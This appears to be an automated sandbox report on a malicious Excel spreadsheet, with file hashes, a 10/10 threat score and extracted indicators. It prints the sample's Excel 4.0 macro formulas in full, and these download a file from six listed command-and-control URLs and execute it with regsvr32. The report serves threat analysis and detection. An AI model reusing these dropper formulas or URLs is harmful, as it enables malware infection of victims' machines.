General

  • Target

    395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347

  • Size

    46KB

  • Sample

    241111-vbnvaavnbq

  • MD5

    0191641064fb537eb5bf246f01155f59

  • SHA1

    6b5983fedfa2d69e9c0cbba17ab0975093de83b6

  • SHA256

    395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347

  • SHA512

    5c3b0587a598dd37f5bf22a8e499c3fcb4d815b9c78836c713b5ca2b181f455f199de81075c69df61ea6a91066e69b61e32cabd540f7569c9866a1bfd20feea2

  • SSDEEP

    768:OEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:ZolvDmtT5fTR4Lh1NisFYBc3cr+UqVUz

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://moveconnects.com/wp-admin/network/7T8g9DAohsL/

http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/

http://mentalpeaks.care/kymogram/ex1hhh/

https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/

http://meca-global.com/okickb/Vm1FMsVcbL/

http://bizfedlacounty.org/wp-auth/GxsV/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://moveconnects.com/wp-admin/network/7T8g9DAohsL/

xlm40.dropper

http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/

xlm40.dropper

http://mentalpeaks.care/kymogram/ex1hhh/

xlm40.dropper

https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/

xlm40.dropper

http://meca-global.com/okickb/Vm1FMsVcbL/

Targets

    • Target

      395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347

    • Size

      46KB

    • MD5

      0191641064fb537eb5bf246f01155f59

    • SHA1

      6b5983fedfa2d69e9c0cbba17ab0975093de83b6

    • SHA256

      395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347

    • SHA512

      5c3b0587a598dd37f5bf22a8e499c3fcb4d815b9c78836c713b5ca2b181f455f199de81075c69df61ea6a91066e69b61e32cabd540f7569c9866a1bfd20feea2

    • SSDEEP

      768:OEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:ZolvDmtT5fTR4Lh1NisFYBc3cr+UqVUz

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks